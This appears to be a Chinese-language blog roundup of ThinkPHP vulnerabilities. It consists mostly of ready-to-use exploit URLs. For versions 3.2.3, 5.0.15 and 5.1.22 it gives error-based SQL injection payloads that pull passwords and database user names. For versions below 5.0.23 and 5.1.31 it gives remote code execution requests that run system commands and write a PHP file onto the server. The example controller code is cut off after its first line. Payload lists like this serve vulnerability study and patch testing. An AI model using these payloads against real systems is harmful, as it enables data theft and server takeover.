梳理下Thinkphp近几年爆出的重要CVE漏洞。
ThinkPHP 3.2.3
where注入
在IndexController.class.php中创建一个文件:
1 | public function index(){ |
访问http://localhost/tp3.2.3/index.php?id[where]=3 and 1=updatexml(1,concat(0x7,(select password from user limit 1),0x7e),1)%23
bind 注入
举例:
1 | public function index(){ |
访问:
1 | http://localhost/tp3.2.3/index.php?username=admin&passwrd=123&id[]=bind&id[]=1 and updatexml(1,concat(0x7,(selectpassword from user limit1),0x7e),1) |
ThinkPHP 5.0.15
update/insert 注入
前提:app_debug开为true,调用insert或者update函数
在application/index/controller/Index.php中插入:
1 | public function index() |
访问:
1 | http://localhost/tp5.0.15/public/index.php?username[0]=incusername[1]=updatexml(1,concat(0x7,user(),0x7e),1)&username[2]=1 |
ThinkPHP 5.1.22
order by 注入
前提:app_debug开为true,同时受到影响的还有3.2.3及以下的版本
在application/index/controller/Index.php中插入:
1 | public function index() |
访问:
1 | http://localhost/tp5.1.22/public/?order[id`|updatexml(1,concat(0x3a,user()),1)%23]=1 |
ThinkPHP5.0.23及5.1.31以下版本
漏洞环境源码:
1 | https://github.com/vulnspy/thinkphp-5.1.29 |
执行系统命令:
1 | http://tp.vsplate.me/public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls%20-l |
1 | http://tp.vsplate.me/public/index.php?s=/index/\think\request/cache&key=ls%20-l|system |
执行phpinfo:
1 | http://tp.vsplate.me/public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=php%20-r%20'phpinfo();' |
1 | http://tp.vsplate.me/public/index.php?s=/index/\think\request/cache&key=1|phpinfo |
写info.php文件:
1 | http://tp.vsplate.me/public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo%20%27<?php%20phpinfo();?>%27%20>%20info.php |
1 | http://tp.vsplate.me/public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=info.php&vars[1][]=%3C?php%20phpinfo();?%3E |